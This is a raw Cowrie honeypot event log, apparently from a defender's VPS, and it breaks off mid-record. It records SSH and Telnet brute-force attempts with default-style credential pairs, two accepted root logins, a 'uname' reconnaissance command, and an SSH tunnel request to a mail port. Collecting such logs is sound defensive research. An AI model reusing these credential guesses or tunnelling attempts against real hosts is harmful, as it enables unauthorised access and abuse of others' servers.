{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:04:32.813066Z","src_ip":"185.93.89.7","session":"113148d6f0eb"}
{"eventid":"cowrie.login.failed","username":"index","password":"password123","message":"login attempt [index/password123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:32.890001Z","src_ip":"185.93.89.7","session":"113148d6f0eb"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:33.590043Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:33.910020Z","src_ip":"185.93.89.7","session":"113148d6f0eb"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:42.123162Z","src_ip":"212.227.235.229","session":"1e5370e54a66"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49760,"dst_ip":"1.2.3.4","dst_port":22,"session":"6535e540af63","protocol":"ssh","message":"New connection: 51.79.164.132:49760 (1.2.3.4:22) [session: 6535e540af63]","sensor":"my-vps","timestamp":"2025-08-28T09:04:50.215255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:04:50.273004Z","src_ip":"51.79.164.132","session":"6535e540af63"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:04:51.184303Z","src_ip":"51.79.164.132","session":"6535e540af63"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:52.710794Z","src_ip":"51.79.164.132","session":"6535e540af63"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:54.377498Z","src_ip":"51.79.164.132","session":"6535e540af63"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43842,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e8306ad2bec","protocol":"ssh","message":"New connection: 185.93.89.7:43842 (1.2.3.4:22) [session: 8e8306ad2bec]","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.043061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.047687Z","src_ip":"185.93.89.7","session":"8e8306ad2bec"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.088536Z","src_ip":"185.93.89.7","session":"8e8306ad2bec"}
{"eventid":"cowrie.login.failed","username":"index","password":"123456","message":"login attempt [index/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.195900Z","src_ip":"185.93.89.7","session":"8e8306ad2bec"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":4338,"dst_ip":"1.2.3.4","dst_port":22,"session":"57c32f31efc6","protocol":"ssh","message":"New connection: 80.94.95.15:4338 (1.2.3.4:22) [session: 57c32f31efc6]","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.330298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.331200Z","src_ip":"80.94.95.15","session":"57c32f31efc6"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.381888Z","src_ip":"80.94.95.15","session":"57c32f31efc6"}
{"eventid":"cowrie.login.success","username":"root","password":"4rfv$RFV","message":"login attempt [root/4rfv$RFV] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.698806Z","src_ip":"80.94.95.15","session":"57c32f31efc6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.750164Z","session":"57c32f31efc6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.801162Z","src_ip":"80.94.95.15","session":"57c32f31efc6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:56.852986Z","src_ip":"80.94.95.15","session":"57c32f31efc6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:57.216537Z","src_ip":"185.93.89.7","session":"8e8306ad2bec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40612,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec6705e100f7","protocol":"telnet","message":"New connection: 212.227.125.160:40612 (1.2.3.4:23) [session: ec6705e100f7]","sensor":"my-vps","timestamp":"2025-08-28T09:05:03.355750Z"}
{"eventid":"cowrie.session.closed","duration":7.990014553070068,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:05:11.345698Z","src_ip":"212.227.125.160","session":"ec6705e100f7"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45986,"dst_ip":"1.2.3.4","dst_port":22,"session":"934f032e62dc","protocol":"ssh","message":"New connection: 51.79.164.132:45986 (1.2.3.4:22) [session: 934f032e62dc]","sensor":"my-vps","timestamp":"2025-08-28T09:05:18.314992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:05:18.427573Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:05:18.862715Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:05:20.718186Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:05:22.075685Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:05:22.076572Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:05:22.307766Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:05:22.308867Z","src_ip":"51.79.164.132","session":"934f032e62dc"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60160,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ea24513c433","protocol":"ssh","message":"New connection: 185.93.89.7:60160 (1.2.3.4:22) [session: 0ea24513c433]","sensor":"my-vps","timestamp":"2025-08-28T09:05:26.485781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:05:26.506635Z","src_ip":"185.93.89.7","session":"0ea24513c433"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:05:26.507667Z","src_ip":"185.93.89.7","session":"0ea24513c433"}
{"eventid":"cowrie.login.failed","username":"index","password":"password","message":"login attempt [index/password] failed","sensor":"my-vps","timestamp":"2025-08-28T09:05:26.571575Z","src_ip":"185.93.89.7","session":"0ea24513c433"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:05:27.591729Z","src_ip":"185.93.89.7","session":"0ea24513c433"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":32918,"dst_ip":"1.2.3.4","dst_port":22,"session":"04fa7e0b6d25","protocol":"ssh","message":"New connection: 51.79.164.132:32918 (1.2.3.4:22) [session: 04fa7e0b6d25]","sensor":"my-vps","timestamp":"2025-08-28T09:05:44.597912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:05:44.724502Z","src_ip":"51.79.164.132","session":"04fa7e0b6d25"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:05:45.293120Z","src_ip":"51.79.164.132","session":"04fa7e0b6d25"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T09:05:46.692369Z","src_ip":"51.79.164.132","session":"04fa7e0b6d25"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:05:48.347515Z","src_ip":"51.79.164.132","session":"04fa7e0b6d25"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":46036,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb0aa0132fee","protocol":"ssh","message":"New connection: 185.93.89.7:46036 (1.2.3.4:22) [session: bb0aa0132fee]","sensor":"my-vps","timestamp":"2025-08-28T09:05:50.414951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:05:50.418799Z","src_ip":"185.93.89.7","session":"bb0aa0132fee"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:05:50.455781Z","src_ip":"185.93.89.7","session":"bb0aa0132fee"}
{"eventid":"cowrie.login.failed","username":"index","password":"123456789","message":"login attempt [index/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T09:05:50.629660Z","src_ip":"185.93.89.7","session":"bb0aa0132fee"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:05:51.650235Z","src_ip":"185.93.89.7","session":"bb0aa0132fee"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49408,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ec589bc3a6","protocol":"ssh","message":"New connection: 51.79.164.132:49408 (1.2.3.4:22) [session: f1ec589bc3a6]","sensor":"my-vps","timestamp":"2025-08-28T09:06:10.566777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:06:10.664952Z","src_ip":"51.79.164.132","session":"f1ec589bc3a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SS